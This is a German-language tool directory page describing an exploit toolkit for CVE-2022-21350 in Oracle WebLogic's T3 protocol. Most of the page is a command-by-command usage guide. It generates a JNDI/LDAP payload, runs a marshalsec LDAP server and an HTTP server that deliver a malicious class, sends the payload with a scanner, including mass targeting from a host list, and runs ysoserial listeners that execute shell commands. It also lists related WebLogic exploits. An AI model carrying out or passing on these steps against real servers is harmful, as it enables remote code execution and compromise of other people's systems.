Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-21350 — Exploit-Toolkit für CVE-2022-21350, das auf das Oracle-WebLogic-T3-Protokoll abzielt, mit Payload-Erzeugung, LDAP/HTTP-Servern und Unterstützung für mehrere JDK-Versionen. | Kitploit
Tools/GitHubGitHub/hktalent/cve-2022-21350
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubhktalent/cve-2022-21350

CVE-2022-21350

Exploit-Toolkit für CVE-2022-21350, das auf das Oracle-WebLogic-T3-Protokoll abzielt, mit Payload-Erzeugung, LDAP/HTTP-Servern und Unterstützung für mehrere JDK-Versionen.

Repository anzeigen
333vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Warum zwei PoCs? Einer enthält com._51pwn.hktalent.CreatJar.main(args); wird verwendet, um das minimale Payload-Erstellungstool zu erstellen. Nach der Erstellung den anderen verwenden.

Das Ausführen von CVE-2022-21350_powerBy_51pwn.jar zum Erstellen des Payloads zeigt Fehler an, beeinträchtigt aber nicht die Nutzung des Payloads.

andere Exploits

root@kitploit:~
CVE_2020_2551
CVE_2020_2555
CVE_2020_2883
CVE_2020_14645
CVE_2020_14756
CVE_2020_14825
CVE_2020_14841
CVE_2021_2394
CVE_2022_21306
CVE_2022_21350

So wird's verwendet

1- Payload generieren

root@kitploit:~
docker run -d -p 7001:7001 -p 8453:8453 -v $PWD/setDomainEnv.sh:/home/weblogic/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/bin/setDomainEnv.sh hktalent/weblogic:12.2.1.4.0

java -cp CVE-2022-21350_powerBy_51pwn.jar com._51pwn.CVE_2022_21350.Main "t3://127.0.0.1:7001/" "ldap://docker.for.mac.localhost:1389/UpX34defineClass"

2- LDAP-Server starten

root@kitploit:~
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer 'http://docker.for.mac.localhost:8888/#UpX34defineClass' 1389

3- HTTP-Server starten, um die Klassendatei zu senden

root@kitploit:~
node httpServer.js

4- Payload senden

root@kitploit:~
py3 ../WeblogicScan.py --tags 21350 -r -v -u http://127.0.0.1:7001
# more
cat ../T3_ver.txt|awk '{print $1}'|py3 ../WeblogicScan.py --tags 21350 -r -v -s  

java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n -Djava.compiler=NONE -cp ysuserial-0.9-su18-all.jar org.su18.ysuserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59"

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 4444 CommonsCollections1 "ping 10.12.35.59" java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "open /System/Applications/Calculator.app" >>/Users/51pwn/MyWork/TestPoc/JRMPListener.ser

Wo ist das Payload?

root@kitploit:~
cat test.ser

Warum Fehlermeldung?

Das Auftreten eines Fehlers beeinträchtigt weder die Generierung des Payloads noch seine Wirkung.

So wird angegriffen

root@kitploit:~
nuclei -duc -t ./network/detection/weblogic-t3-detect.yaml -l list.txt

Unterstützte Tools:

  • 1- Weblogic Version
  • 12.1.3.0.0
  • 12.2.1.3.0
  • 12.2.1.4.0
  • 2- JDK < 1.8
  • 3- Server erlaubt OOB

So wird gebaut / JAR zusammengeführt

root@kitploit:~
cd lib3
# split 
py3 ../tools/splitTools.py -s wlfullclient_12.1.3.jar
# merge 
py3 ../tools/splitTools.py -m wlfullclient_12.1.3.jar

Besonderer Dank

  • <a href=https://github.com/lz520520>@lz520520
  • <a href=https://github.com/Y4er>@Y4er
Tool herunterladen